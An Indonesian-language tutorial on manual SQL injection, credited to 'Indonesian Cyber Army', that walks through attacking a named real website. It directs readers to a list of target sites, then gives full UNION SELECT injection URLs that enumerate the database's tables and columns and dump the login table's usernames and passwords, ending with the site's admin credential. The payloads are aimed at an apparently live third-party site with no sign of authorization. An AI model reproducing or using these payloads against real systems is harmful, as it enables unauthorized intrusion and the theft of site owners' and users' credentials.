Keamanan Jaringan SQL INJECTION

SQL INJECTION

SQL Injection merupakan teknik hacking dimana seorang penyerang dapat memasukkan perintah-perintah SQL melalui URL untuk dieksekusi oleh database. 

1. Cari website target yang akan kita tuju seperti dibawah ini bisa cari di http://sqli20162016.blogspot.co.id

 2. Pilih salah satu web contohnya seperti ini 

 3. Kemudian beri kutip disebelah url agar kita bisa pastikan bahwa web yang kita tuju dapat dibobol

4. Kemudian kita akan mencari dan menghitung jumlah tabel yang ada pada database web tersebut. Menggunakan perintah : order by 1-- hingga seterusnya menemukan terjadi error pada halaman web (order by 5--)

5. Selanjutnya kita akan mencari angka tabel yang bisa digunakan untuk perintah-perintah selanjutnya. Menggunakan perintah union select :

http://staywellayurveda.com/treatment_read.php?id=-24 union select 1,2,3,4--

 6. Maka akan muncul seperti ini

 7. Langkah selanjutnya adalah dengan mengekstrak apa saja yang ada di angka 2 dengan cara menjadi seperti : 

http://staywellayurveda.com/treatment_read.php?id=-24 union select 1,group_concat(table_name),3,4+from+information_schema.tables+where+table_schema=database()--  
 Maka hasilnya akan seperti ini : 

8. Karena ada hasil login maka kita coba kembali mengekstrak login untuk mengetahui apa yang ada di dalam login dengan cara :

http://staywellayurveda.com/treatment_read.php?id=-24 union select 1,group_concat(column_name),3,4+from+information_schema.columns+where+table_name=0x6C6F67696E --

Maka hasilnya seperti ini :

 PS : 6C6F67696E didapat dari hasil konversi login ke bentuk heksa desimal

9. Selanjutnya untuk mengekstrak uname dan pword dengan perintah sebagai berikut :

http://staywellayurveda.com/treatment_read.php?id=-24 union select 1,group_concat(uname,0x3a,pword),3,4+from+login--

10. Nah dari gambar diatas sudah didapat bahwa uname yang tadi dicari adalah admin dan pword nya adalah asd

Sumber : 

Cara Hacking Website Dengan Teknik Manual SQL Injection ~ Indonesian Cyber Army.htm